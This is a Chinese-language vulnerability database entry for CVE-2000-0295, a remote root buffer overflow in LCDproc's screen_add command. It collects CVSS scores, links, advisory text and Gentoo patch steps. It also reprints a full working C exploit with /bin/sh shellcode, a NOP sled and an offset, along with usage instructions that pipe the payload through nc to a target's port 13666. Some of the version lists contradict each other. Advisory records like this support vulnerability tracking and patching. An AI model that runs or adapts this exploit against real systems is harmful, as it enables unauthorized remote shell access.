CVE-2000-0295
CVSS10.0
发布时间 :2000-04-21 00:00:00
修订时间 :2008-09-10 15:04:00
NMCOES    

[原文]Buffer overflow in LCDproc allows remote attackers to gain root privileges via the screen_add command.


[CNNVD]多个厂商Linux LCDProc的缓冲区溢出漏洞(CNNVD-200004-059)

        LCDproc中存在缓冲区溢出漏洞,远程攻击者可以通过screen_add命令获取根用户权限。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0295
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0295
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200004-059
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.3.96.1000421010946.15318I-200000@schizo.strange.net
(VENDOR_ADVISORY)  BUGTRAQ  20000420 Remote vulnerability in LCDproc 0.4
http://www.securityfocus.com/bid/1131
(VENDOR_ADVISORY)  BID  1131
http://xforce.iss.net/xforce/xfdb/4315
(UNKNOWN)  XF  lcdproc-remote-overflow(4315)
http://www.securityfocus.com/archive/1/archive/1/305589/30/26390/threaded
(UNKNOWN)  GENTOO  GLSA-200301-07
http://secunia.com/advisories/7829
(UNKNOWN)  SECUNIA  7829

- 漏洞信息

多个厂商Linux LCDProc的缓冲区溢出漏洞
危急 缓冲区溢出
2000-04-21 00:00:00 2005-10-20 00:00:00
远程  
        LCDproc中存在缓冲区溢出漏洞,远程攻击者可以通过screen_add命令获取根用户权限。

- 公告与补丁

        It is recommended that all Gentoo Linux users who are running
        app-misc/lcdproc-0.4.1-r1 or earlier update their systems as
        follows:
        emerge rsync
        emerge lcdproc
        emerge clean
        A patch was supplied with the post to the Bugtraq mailing list. In addition, downgrading to a previous version of LCDProc, which does not utilize a client/server model, will eliminate this problem. Those versions of LCDProc are available at lcdproc.omnipotent.net.
        LCDProc LCDProc 0.4
        

- 漏洞信息 (19868)

LCDProc 0.4 Buffer Overflow Vulnerability (EDBID:19868)
linux remote
2000-04-23 Verified
0 Andrew Hobgood
N/A [点击下载]
source: http://www.securityfocus.com/bid/1131/info

A vulnerability exists in the server portion of version 0.4 of the LCDProc package. Several remote buffer overflows exist that could allow a remote attacker to corrupt memory and execute arbitrary code. As listed in the Bugtraq posting revealing this vulnerability, overflows exist at:

parse.c:149: sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]);
screenlist.c:119: sprintf(str, "ignore %s\n", old_s->id);
screenlist.c:134: sprintf(str, "listen %s\n", s->id);

It is possible to exploit this conditions to execute code with the privileges of the user LCDProc is running as.

/*****
 * lcdproc-exploit.c
 *****
 *
 * LCDproc 0.4-pre9 exploit
 # 
 # Andrew Hobgood <chaos@strange.net>
 * Kha0S on #LinuxOS/EFnet
 * 
 * Tested on Linux/x86 2.2.5-15smp (the only Intel box I could get my hands
 * on for testing).
 * 
 *****
 */
   
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define BUFFERSIZE 269
#define NOP 0x90
#define OFFSET 0xbffff750
 
char shellcode[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh";
   
int main(int argc, char **argv) {
        char *ptr, buffer[BUFFERSIZE];
        unsigned long *long_ptr, offset = OFFSET;
        int aux;
   
        fprintf(stderr, "LCDproc exploit by Andrew Hobgood <chaos@strange.net>\n\n");
        fprintf(stderr, "Usage: (%s [<offset>]; cat) | nc <target> 13666\n\n", argv[0]);

        if (argc == 2) offset += atol(argv[1]);

        ptr = buffer;
        memset(ptr, 0, sizeof(buffer));
        memset(ptr, NOP, sizeof(buffer) - strlen(shellcode) - 16);
        ptr += sizeof(buffer) - strlen(shellcode) - 16;
        memcpy(ptr, shellcode, strlen(shellcode));
        ptr += strlen(shellcode);
        long_ptr = (unsigned long *) ptr;
        for(aux=0; aux<4; aux++) *(long_ptr++) = offset;  
        ptr = (char *) long_ptr;
        *ptr = '\0';
   
        fprintf(stderr, "Buffer size: %d\n", (int) strlen(buffer));
        fprintf(stderr, "Offset: 0x%lx\n\n", offset);
        
        printf("hello\n");
        fflush(stdout);
        sleep(1);
        printf("screen_add {%s}\n", buffer);
        fflush(stdout);
        
        return(0);
}       
/*** end lcdproc-exploit.c ***/		

- 漏洞信息

13654
LCDproc screen_add Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Third-Party Solution
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-04-20 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or vendor upgrades to correct this issue. However, Andrew Hobgood has released an unofficial patch to address this vulnerability. As with all third-party solutions, ensure they come from a reliable source and are permitted under your company's security policy.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor Linux LCDProc Buffer Overflow Vulnerability
Boundary Condition Error 1131
Yes No
2000-04-23 12:00:00 2009-07-11 01:56:00
This vulnerability was posted to the Bugtraq mailing list on April 21, 2000 by Andrew Hobgood <chaos@strange.net>

- 受影响的程序版本

LCDProc LCDProc 0.4
LCDProc LCDProc 0.4.1 -r1
LCDProc LCDProc 0.3

- 不受影响的程序版本

LCDProc LCDProc 0.4.1 -r1
LCDProc LCDProc 0.3

- 漏洞讨论

A vulnerability exists in the server portion of version 0.4 of the LCDProc package. Several remote buffer overflows exist that could allow a remote attacker to corrupt memory and execute arbitrary code. As listed in the Bugtraq posting revealing this vulnerability, overflows exist at:

parse.c:149: sprintf(errmsg, "huh? Invalid command \"%s\"\n", argv[0]);
screenlist.c:119: sprintf(str, "ignore %s\n", old_s-&gt;id);
screenlist.c:134: sprintf(str, "listen %s\n", s-&gt;id);

It is possible to exploit this conditions to execute code with the privileges of the user LCDProc is running as.

- 漏洞利用

The following exploit is available:

- 解决方案

It is recommended that all Gentoo Linux users who are running
app-misc/lcdproc-0.4.1-r1 or earlier update their systems as
follows:

emerge rsync
emerge lcdproc
emerge clean

A patch was supplied with the post to the Bugtraq mailing list. In addition, downgrading to a previous version of LCDProc, which does not utilize a client/server model, will eliminate this problem. Those versions of LCDProc are available at lcdproc.omnipotent.net.


LCDProc LCDProc 0.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站